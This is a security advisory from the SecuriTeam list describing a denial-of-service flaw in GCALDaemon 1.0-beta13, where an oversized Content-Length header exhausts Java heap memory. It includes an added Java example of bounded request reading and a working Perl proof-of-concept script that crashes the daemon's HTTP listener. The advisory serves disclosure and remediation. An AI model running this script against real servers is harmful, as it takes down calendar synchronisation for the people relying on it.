[NEWS] GCALDaemon DoS



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



GCALDaemon DoS
------------------------------------------------------------------------


SUMMARY

<http://gcaldaemon.sourceforge.net/> GCALDaemon is "an OS-independent
Java program that offers two-way synchronization between Google Calendar
and various iCalendar compatible calendar applications. GCALDaemon is
primarily designed as a calendar synchronizer but it can also be used as a
Gmail notifier, Address Book importer, Gmail terminal and RSS feed
converter".

Sunbird, Kontact, Firefox, Thunderbird and Mozilla Calendar all share calendars
over HTTP: each client uploads its calendar file with an HTTP PUT and fetches or
refreshes it with an HTTP GET. GCALDaemon's built-in HTTP server keeps these
HTTP messages in sync with a specified Google Calendar. An input validation
flaw allows an attacker to craft an HTTP request with an abnormal
Content-Length value; this malformed request can trigger a denial of service
arising from a Java out-of-memory fatal error.

DETAILS

Vulnerable Systems:
* GCALDaemon version 1.0-beta13

Using a crafted HTTP request, an attacker could trigger a denial of service
arising from a java.lang.OutOfMemoryError when the Java heap space is
exhausted. In the file "org/gcaldaemon/core/http/HTTPListener.java",
GCALDaemon's built-in HTTP server parses the HTTP request and the HTTP header
parameters without any validation checks. At line 490 of
"org/gcaldaemon/core/http/HTTPListener.java" the value of the "Content-Length"
header is used directly to size a new byte array; when the declared size is
large enough, the allocation triggers a Java fatal error that blocks the HTTP
daemon:

Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap space
        at org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
        at org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)
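As an added illustration (not GCALDaemon's own code), this is the bounded way to honour a Content-Length header: the value is validated against a hard cap before anything is allocated, and the body is then read in fixed-size chunks so memory grows with the bytes actually received rather than with the size the client declares. The class name, the 8 MB limit and the sample upload are assumptions; the vulnerable pattern the advisory describes is the one-liner `new byte[declaredContentLength]`.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;

// Added illustration, not GCALDaemon's own code: bounded handling of Content-Length.
public final class BoundedBodyReader {
    // Assumed policy limit: the largest iCalendar upload the listener will accept.
    static final int MAX_BODY_BYTES = 8 * 1024 * 1024;

    /** Parses Content-Length, rejecting malformed, negative or oversized values. */
    static int parseContentLength(String headerValue) throws IOException {
        long declared;
        try {
            declared = Long.parseLong(headerValue.trim());
        } catch (NumberFormatException e) {
            throw new IOException("400 Bad Request: malformed Content-Length");
        }
        if (declared < 0) throw new IOException("400 Bad Request: negative Content-Length");
        if (declared > MAX_BODY_BYTES) {
            throw new IOException("413 Request Entity Too Large: " + declared + " bytes");
        }
        return (int) declared;
    }

    /** Reads exactly 'length' bytes in chunks; memory tracks data received, not the header. */
    static byte[] readBody(InputStream in, int length) throws IOException {
        ByteArrayOutputStream body = new ByteArrayOutputStream(Math.min(length, 64 * 1024));
        byte[] chunk = new byte[8192];
        for (int remaining = length; remaining > 0; ) {
            int n = in.read(chunk, 0, Math.min(chunk.length, remaining));
            if (n < 0) throw new IOException("400 Bad Request: body shorter than Content-Length");
            body.write(chunk, 0, n);
            remaining -= n;
        }
        return body.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        try {                                   // the PoC's header value is refused up front
            parseContentLength("1000000000");
        } catch (IOException rejected) {
            System.out.println("rejected: " + rejected.getMessage());
        }
        byte[] ics = "BEGIN:VCALENDAR\r\nEND:VCALENDAR\r\n".getBytes("US-ASCII"); // constructed upload
        byte[] body = readBody(new ByteArrayInputStream(ics), parseContentLength("" + ics.length));
        System.out.println("read " + body.length + " bytes");
    }
}
```

With the cap in place the 1000000000-byte header from the proof of concept is answered with an error before any buffer exists, so the listener thread survives and keeps serving legitimate clients.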

Exploit:
The provided proof-of-concept can trigger the issue.

--------------------------------------------
#!/usr/bin/perl
# Proof of concept: sends a request whose Content-Length header declares a
# body far larger than the server can allocate.

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;    # port defaults to 9090 unless given
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                 Proto    => 'tcp')
    or die "error: $!\n";
print "GCALDaemon DoS Exploit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
--------------------------------------------


ADDITIONAL INFORMATION

The information has been provided by
<mailto:luca.carettoni@xxxxxxxxxxxxxxxx> Luca Carettoni.



